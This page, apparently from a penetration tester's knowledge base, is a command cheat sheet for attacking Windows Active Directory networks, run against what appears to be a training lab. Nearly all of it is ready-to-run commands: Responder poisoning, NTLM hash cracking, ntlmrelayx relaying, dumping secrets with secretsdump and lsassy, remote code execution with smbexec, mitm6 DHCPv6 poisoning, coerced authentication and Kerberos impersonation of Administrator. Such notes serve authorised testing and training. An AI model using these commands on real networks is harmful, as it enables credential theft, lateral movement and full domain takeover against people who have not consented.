Malleum Knowledge Base

Poison and relay

4 min read

Responder

It will give you :

  • usernames
  • netntlmv1 (if the server is very old) / netntlmv2 hashes
  • the ability to redirect the authentication (NTLM relay)
responder -I $interfacename
hashcat -m 5600 --force -a 0 responder.hashes /usr/share/wordlists/rockyou.txt
  • Alternate responder
 
sudo su
cd /opt/active_directory/Responder
source venv-responder/bin/activate
sudo systemctl stop smbd
sudo systemctl disable smbd

/Responder.py -I tun0

Responder keep the logs in /opt/tools/Responder/logs (on exegol), if you need to show them again.

If you want to delete the previous captured logs (message skipped previously captured hash) delete the file /opt/tools/Responder/Responder.db

If we are not able to crack the password offline then there is possibility of performing relaying attack.

SMB signing must be false on the server we are attacking to carry out this attack.

responder + ntlmrelayx to smb

Finding unsigned SMB servers

cme smb $IP-range --gen-relay-list relay.txt

Relaying settings for Responder

Before starting responder to poison the answer to LLMNR, MDNS and NBT-NS request we must stop the responder smb and http server as we don’t want to get the hashes directly but we want to relay them to ntlmrelayx.

OFF
sudo sed -i 's/HTTP = On/HTTP = Off/g' /usr/share/responder/Responder.conf && cat /usr/share/responder/Responder.conf | grep --color=never 'HTTP ='
sudo sed -i 's/SMB = On/SMB = Off/g' /usr/share/responder/Responder.conf && cat /usr/share/responder/Responder.conf | grep --color=never 'SMB ='
ON
sudo sed -i 's/HTTP = Off/HTTP = On/g' /usr/share/responder/Responder.conf && cat /usr/share/responder/Responder.conf | grep --color=never 'HTTP ='
sudo sed -i 's/SMB = Off/SMB = On/g' /usr/share/responder/Responder.conf && cat /usr/share/responder/Responder.conf | grep --color=never 'SMB ='

sudo sed -i -E 's/(HTTP|SMB)[[:space:]]+=[[:space:]]+On/\1      = Off/g' /usr/share/responder/Responder.conf && grep -E '(HTTP|SMB)[[:space:]]+=' /usr/share/responder/Responder.conf | head -3

sudo sed -i -E 's/(HTTP|SMB)[[:space:]]+=[[:space:]]+Off/\1      = On/g' /usr/share/responder/Responder.conf && grep -E '(HTTP|SMB)[[:space:]]+=' /usr/share/responder/Responder.conf | head -3

Start NTMLrelayx

ntlmrelayx.py -tf relay.txt -of netntlm -smb2support -socks
  • -tf : list of targets to relay the authentication
  • -of : output file, this will keep the captured smb hashes just like we did before with responder, to crack them later
  • -smb2support : support for smb2
  • -socks : will start a socks proxy to use relayed authentication

pip3 install Flask Jinja2 --upgrade

responder -I $Interfacename

Use the socks connections to dump secrets with impacket

proxychains secretsdump.py -no-pass 'NORTH'/'EDDARD.STARK'@'192.168.56.22'

Use the socks connection to dump secrets with lassy

proxychains lsassy --no-pass -d NORTH -u EDDARD.STARK 192.168.56.22

Use the socks connection to dump secrets with Donpapi

proxychains DonPAPI -no-pass 'NORTH'/'EDDARD.STARK'@'192.168.56.22'

SMBclient

  • Connect directly to the smbserver with smbclient
proxychains smbclient.py -no-pass 'NORTH'/'EDDARD.STARK'@'192.168.56.22' -debug

Code execution : smbexec or atexec

  • With a socks connection you can only use smbexec or atexec. Neither wmiexec, psexec nor dcomexec will work.
proxychains smbexec.py -no-pass 'NORTH'/'EDDARD.STARK'@'192.168.56.22' -debug

Mitm6 + ntlmrelayx to ldap

Another useful way to poison the network is by giving answer to DHCPv6 requests and setting our host as the default DNS server. Windows by default prefers IPv6 over IPv4 so we could capture and poison the response to DHCPv6 query to change the DNS server and redirect queries to our machine with the tool MITM6.

Start mitm6 for all the domains in the network

mitm6 -i wlan0 -d essos.local -d sevenkingdoms.local -d north.sevenkingdoms.local --debug

Answer to wpad queries and relay the http query to ldaps on DC to add a computer with delegate access.

ntlmrelayx.py -6 -wh wpadfakeserver.essos.local -t ldaps://meereen.essos.local --add-computer relayedpccreate --delegate-access

Extra dont know much about it yet

ntlmrelayx.py -6 -wh wpadfakeserver.essos.local -t ldaps://meereen.essos.local -l /workspace/loot

Open an RDP connection to the system

Coerced auth smb + ntlmrelayx to ldaps with drop the mic

  • Start the relay with remove mic to the ldaps of meereen.essos.local.
ntlmrelayx -t ldaps://meereen.essos.local -smb2support --remove-mic --add-computer removemiccomputer --delegate-access
  • Run the coerce authentication on braavos (braavos is a windows server 2016 up to date so petitpotam unauthenticated will not work here)
python3 coercer.py -u khal.drogo -d essos.local -p horse -t braavos.essos.local -l 192.168.56.1

getST.py -spn HOST/BRAAVOS.ESSOS.LOCAL -impersonate Administrator -dc-ip 192.168.56.12 'ESSOS.LOCAL/removemiccomputer$:{yp};c@.>,{zoqu'


export KRB5CCNAME=Administrator.ccache

secretsdump -k -no-pass ESSOS.LOCAL/'Administrator'@braavos.essos.local|

Graph View

Backlinks